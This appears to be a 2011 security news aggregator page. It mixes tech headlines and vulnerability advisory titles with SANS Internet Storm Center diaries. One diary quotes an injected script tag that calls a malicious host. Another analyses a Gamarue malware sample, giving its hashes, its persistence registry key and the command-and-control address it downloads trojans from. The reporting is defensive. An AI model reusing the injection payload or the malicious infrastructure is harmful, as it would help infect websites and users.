Hackin9

InfoSec News

(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
iPhone users can turn off the Carrier IQ software that's raised a ruckus among consumers, bloggers and privacy advocates with just four taps.
 
Verizon Wireless said Thursday it doesn't add to its phones any software from Carrier IQ, the company that has come under fire in the past few days for what some say amounts to spying on mobile phone users.
 
The recent disclosure that top mobile phone providers are using software from Carrier IQ that critics say can gather and track all sorts of personal data from a user's smartphone has sparked a firestorm of controversy.
 
CoDeSys Buffer Overflow Vulnerability and Integer Overflow Vulnerability
 
The flooding in Thailand that has left the storage industry with a dearth of hard drives has also caused a temporary rush on solid-state drives, according to DRAMeXchange.
 
As the end of the year approaches, a look at what people searched for and shared online can start painting a picture of what most interested people during 2011.
 
Web tracker StatCounter says that for the first time, usage of Google's Chrome Web browser has surpassed Firefox to become the second most popular browser, behind Microsoft[<a
 
Serendipity 'serendipity[filter][bp.ALT]' Parameter Cross Site Scripting Vulnerability
 
We've had several reports (thanks guys) of sites being injected with the following string:
/titlescript src=hXXp://lilupophilupop.com/sl.php/script
Typically it is inserted into several tables. From the information gathered so far it looks targeted at ASP, IIS and MSSQLbackends, but that is just speculation. If you find that you have been infected please let us know and if you can share packets, logs please upload them on the contact form.
Mark
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
VirtualSharp hopes to soon let its customers set up disaster recovery plans that fail over from their private clouds to public clouds, the company announced this week at the CloudBeat conference in Redwood City, California.
 
A snapshot of high-tech development in Massachusetts by the federal government found that tech employment in the state declined 15% between 2001 and 2009. Tech salaries, however, rose about 30%.
 
Sprint Nextel may help finance Clearwire's LTE network and keep offering WiMax service through 2015 under a set of agreements worth as much as US$1.6 billion that the companies laid out on Thursday.
 
The U.S. Federal Communications Commission has invited questions about its impartiality with a staff report laying out concerns about AT&T's proposed acquisition of rival mobile carrier T-Mobile USA, AT&T said Thursday.
 
Google's open-source Android 4.0 operating system for smartphones and tablets has been ported to work with x86 processors, a member of an open-source project involved in the effort said this week.
 
Amid what's snowballing into a major privacy controversy, AT&T, Sprint, HTC and Samsung today confirmed that that their mobile phones integrate a controversial piece of smartphone tracking software from a company called Carrier IQ.
 
Cyrus IMAPd NTTP Logic Error Authentication Bypass Vulnerability
 
Cyrus IMAP Server 'index_get_ids()' NULL Pointer Dereference Denial Of Service Vulnerability
 
[SECURITY] [DSA 2356-1] openjdk-6 security update
 
Re: Serendipity 'serendipity[filter][bp.ALT]' Cross-Site Scripting vulnerability
 
Re: Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
 
Google's Chrome edged Mozilla's Firefox last month to take the number two spot in the browser popularity wars, an Irish metrics company said.
 
Ariadne 2.7.6 Multiple XSS vulnerabilities
 
Re: Contao 2.10.1 Cross-site scripting vulnerability
 
Intel has taken on a challenge from Samsung Electronics head-on by picking up the pace and regaining its long-held dominance in the worldwide chip market.
 
For the new release of its WebLogic, Oracle has tailored the enterprise Java application server so that it can be used more easily in cloud deployments.
 
Microsoft's declaration this week that Office 365 is enjoying unprecedented levels of sales success didn't fully convince some industry experts who were expecting the company to back up its claims with more concrete figures and who feel it's too early for a victory lap.
 
Amid what's snowballing into a major privacy controversy, AT&T, Sprint, HTC and Samsung today confirmed that that their mobile phones integrate a controversial piece of smartphone tracking software from a company called Carrier IQ.
 
Re: Wordpress plugin BackWPup Remote and Local Code Execution Vulnerability - SOS-11-003
 
[security bulletin] HPSBPI02728 SSRT100692 rev.1 - Certain HP Printers and HP Digital Senders, Remote Firmware Update Enabled by Default
 
Re: Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities
 
Blackberry Mobile Fusion hit our radar for obvious reasons. The exploding mobile/devices space presents deep challenges from a device management perspective, but imagine a focused security model with broad device diversity. This is the solution RIM has announced inBlackberry Mobile Fusion including, from our slightly more narrow perspective:

Asset management and configuration management
Security and policy definition and management
Secure and protect lost or stolen devices (remote lock, wipe)
User- and group-based administration
Application and software management
Connectivity management (VPN, certificates)

This is an ambitious offering and if secure device management at scale worries you, this announcement is well worth your time to read.
http://press.rim.com/release.jsp?id=5285 (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
Contao 'X_FORWARDED_FOR' HTTP Header Arbitrary Script Injection Vulnerability
 
Re: [MajorSecurity SA-081]Contao CMS 2.9.2 - Persistent Cross Site Scripting Issue
 
Shaw reviews the Samsung Galaxy Tab 7.0 Plus and the Motorola Xoom 4G LTE.
 
Apple iPhone 4S owners rated their smartphones higher than did people using last year's iPhone 4, ChangeWave Research said today.
 
Cisco Systems in the first half of next year will release a tablet with a larger screen than the current Cius, the first move in the company's long-term plans to introduce tablets in multiple sizes, an executive said this week.
 
 
Re: Wordpress enable-latex plugin Remote File Include Vulnerabilities
 
[SECURITY] [DSA 2355-1] clearsilver security update
 
A coding error in the Adobe Flex SDK could cause developers to create applications with cross-site scripting issues, according to an advisory issued by Adobe Systems.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
 
There's a phenomenon that economists describe as a "race to the bottom," where vendors compete by undercutting in price, which leads to a reduction in quality and service. In businesses like airlines, trains, telecoms -- with huge fixed costs -- these downward spirals of service can last for decades because, fundamentally, the customers don't have that much choice. Any vendor foolish enough to offer great service will see their costs go up...and their sales go down. Despite complaints about lousy service, the customer won't tolerate big price increases.
 
If nothing else, the now disputed "hacking" of an Illinois water utility has brought the spotlight back to shine on the vulnerability of our national infrastructure.
 
Sharp announced a camera module for smartphones that shoots 12.1 megapixels and is just 5.47-mm (0.22 inches) thick, which it says is the thinnest in the industry.
 
Walmart has launched its Shopycat application, that uses information on the interests of friends on Facebook to make recommendations on gifts for them from Walmart stores and other sites.
 
WikiLeaks on Thursday released a broad study of the brisk global trade in surveillance products, which founder Julian Assange claimed exposes a broad risk to peoples' privacy, while also launching a revamped submissions platform.
 
Heres one thats making the rounds over the last few days and showed upin my SPAM folderwith a helpful attachment. I'm one of those weird people who look to explore the depths of said SPAM folder to see what fun I might find therein.
As an example:

From: United States Postal Service [email protected]
Subject: USPS Delivery Failure Notification

Hello!
Unfortunately we failed to deliver the postal package you have sent on theblah, blah, blah.

Ruh-roh!
The attachment is USPS report.pdf.zip and once unpacked yields USPS report.pdf.exe (MD5: 1fd6c3470b81f278572a27a1bf34cdf2)
A hash search finds this sample already submitted to ThreatExpert and VirusTotal yielding results that refer to theGamarue you may have seen similar with regard to ACH or Federal Reserve SPAM.
Data from the Microsoft Malware Protection Center shows a steady level of activity for the family overall and indications of this sample as new variant in the last couple of days (per the hash).
This particular sample, as is consistent with other Gamarue samples, modifies HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run and injects itself into wuauclt.exe.

These little exercises are always an opportunity to run output though some of my favorite tools (unabashed tool geek).
I ran the PCAP acquired during runtime through NetworkMiner 1.2 which reassembled the following malware downloaded when it phoned home to 85.121.38.27 (htobertur.ru):
Trojan:Win32/FakeSysdef (MD5: 8ae00c31b5546ee5a1b107c997171bde)
Trojan.Win32.Scar.fevl (MD5: d476533ea0aacb8244dfe0f5e65862a9)
A quick review of the Romanian ASN (AS43215 Monyson Grup S.A.) for the above mentioned IP address shows a tendency towards association with the likes of Blackhole (as referred to in Pedros diary), fake AV, pharma SPAM, Zeus, SpyEye, and other instruments of ne'er do wells and malcontents. Zoinks!
A quick Maltego run on Monyson Grup S.A. as a phrase entity proves this out.

As a friend commented with both humor and sincerity: stay out of that neighborhood.
And they would have gotten away with it too, if it weren't for those meddling kids

Russ McRee

@holisticinfosec (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
WikiLeaks on Thursday released a broad study of the brisk global trade in surveillance products, which founder Julian Assange [cq] claimed exposes a broad risk to peoples' privacy, while also launching a revamped submissions platform.
 
Renesas Electronics will upgrade its Japanese factories so that they can be up and running within a month after a major quake like the one that struck Japan in March.
 
Vodafone's Global Enterprise is strengthening its professional services arm by acquiring British consultant Bluefish Communications, which will form the basis of a new unified communication and collaboration practice, the operator said on Thursday.
 
As students study other technologies, vendors try to develop new talent and offer tools to fill the gap for these critical systems
 
Sure, there are budget constraints and far fewer resources. But being an IT leader in a small shop has numerous benefits, not the least of which are agility and a greater ability to influence the business.
 
AT&T and China Telecom signed an agreement on Wednesday to share telecommunications infrastructure across the U.S. and China, in a move meant to help their business customers.
 
Alibaba Group said it has not decided to be part of a bid for the whole of Yahoo, countering reports that the Chinese company is in talks with private equity firms to make such a bid.
 
Mozilla is mulling the end of Firefox support for Mac owners running Leopard, the Apple operating system released four years ago, developer discussions show.
 
After years of fighting Intel and not fairing so well, Advanced Micro Devices is no longer going to focus on its main chip rival.
 
ClearSilver 'neo_cgi' Module Format String Vulnerability
 

Posted by InfoSec News on Dec 01

http://www.computerworld.com/s/article/9222293/Duqu_hackers_scrub_evidence_from_command_servers_shut_down_spying_op

By Gregg Keizer
Computerworld
November 30, 2011

The hackers behind the Duqu botnet have shut down their snooping
operation, a security researcher said today.

The 12 known command-and-control (C&C) servers for Duqu were scrubbed of
all files on Oct. 20, 2011, according to Moscow-based Kaspersky Lab.

That was just two days...
 

Posted by InfoSec News on Dec 01

http://news.hjnews.com/news/article_d8c60e9c-1afe-11e1-9c4d-001cc4c002e0.html

By Amy Macavinta
The Herald Journal
November 29, 2011

A senior scientist of Frontier Scientific Inc. of North Logan has been
accused of stealing proprietary information and sending it to a foreign
company in what the FBI says is a rare case of industrial espionage.

According to a criminal complaint filed in U.S. District Court in Salt
Lake City on Nov. 10, Prabhu...
 

Posted by InfoSec News on Dec 01

http://www.wired.com/threatlevel/2011/11/water-pump-hack-mystery-solved/

By Kim Zetter
Threat Level
Wired.com
November 30, 2011

It was the broken water pump heard ’round the world.

Cyberwar watchers took notice this month when a leaked intelligence memo
claimed Russian hackers had remotely destroyed a water pump at an Illinois
utility. The report spawned dozens of sensational stories characterizing it as
the first-ever reported...
 

Posted by InfoSec News on Dec 01

http://www.guardian.co.uk/media/2011/dec/01/gchq-computer-hackers-ad

By Mark Sweney
guardian.co.uk
30 November 2011

The government intelligence service, GCHQ, is aiming to attract the next
generation of web-savvy spies by running an ad campaign that challenges
computer hackers to crack a code to get an interview.

GCHQ, which reports to the foreign secretary and works with MI5 and MI6,
has set up a websitethat is home to a tricky visual...
 

Posted by InfoSec News on Dec 01

http://www.darkreading.com/database-security/167901020/security/news/232200517/researchers-say-oracle-leaves-databases-needlessly-vulnerable.html

By Ericka Chickowski
Contributing Editor
Dark Reading
Nov 30, 2011

Is Oracle just paying lip service to database security? Some researchers
within the database community think so, complaining that as the software
juggernaut has grown with acquisitions such as the blockbuster Sun deal
it hasn't...
 
Internet Storm Center Infocon Status